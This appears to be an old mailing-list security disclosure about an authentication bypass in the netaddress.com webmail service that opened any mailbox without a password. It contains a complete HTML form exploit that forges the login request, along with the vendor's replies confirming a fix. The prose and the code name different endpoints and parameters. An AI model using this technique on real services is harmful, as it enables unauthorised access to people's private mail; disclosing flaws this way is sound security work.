Hi, Vulnerable ========== netaddress.com mailing service This mail is Continuation of the previous mails i sent regarding security flaw in netaddress.com, which will open anybody's mailbox with out password. i got a mail with attached html page. which is nothing but saved html home page of netaddress.com(old one).Itz old home page design. when i submit the form without password it opened the mail box. Yes it opens every mail box without password. All you need is valid netaddress id. Problem: While submitting the login form to /tpl/Door/Login it needs just only three parameters maidid, domainid(value=4), domain(value=usa.net). Create a html file which contains all the three parameters. sumit the form to http://netaddress.com//tpl/door/login . Note that give double slash after neraddress.com. while i tried with single slash it didn`t work. Here is the Exploit code(save this as html and run it in local. Submit only with userid) Exploit Code: <html> <form name="loginform" action="http://classic.netaddress.com//tpl/Door/LoginPost"; method="POST" target=_blank> <input type="hidden" name="LoginState" value="2"> <input type="hidden" name="DomainID" value="4"> <input type="hidden" name="Domain" value="usa.net"> <b><font color="#FF0000" size="2" face="Arial">Netaddress Security hole - Demo</font></b><font face="Arial" size="2"><br> <br> Developed By Syed Mohamed (<a href="mailto:syedblr@hotmail.com";>syedblr@hotmail.com</a>)<br> <br> Just Enter Login ID (enter example if netaddress id is example@usa.net)</font> <p> <input type="text" size="16" name="UserID" value=""> <input type="submit" value="Login"> </form> </p> </html> I hv informed the issue to usa.net.( i had only abuse and postmaster id of usa.net.. info id bounced back) ook 3 hrs to solve this issue. Now they hv solved the issue. Vendor's response: ================== First Response: =============== Thank you for your notification. We are addressing this issue. Regards, USA.NET, Inc. Second Response: ================ Dear Sir/Madam, USA.NET’s technical and security teams have been made aware of this issue and it has been corrected. We appreciate your patience as we strive to bring you the most robust email solution possible. Regards, Abuse Dept. abuse@usa.net USA.Net, Inc. Third Respose: ============= Yes, this problem has been corrected. Thank you for your assistance, USA.NET, Inc. Thankx to usa.net for responding with great speed Thankx to my friend Thejaswini who forwarded the old netaddress html page. Regards Syed Mohamed syedblr@hotmail.com (Wanna defeat hackers..think like a hacker.. work like a secutity expert) _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
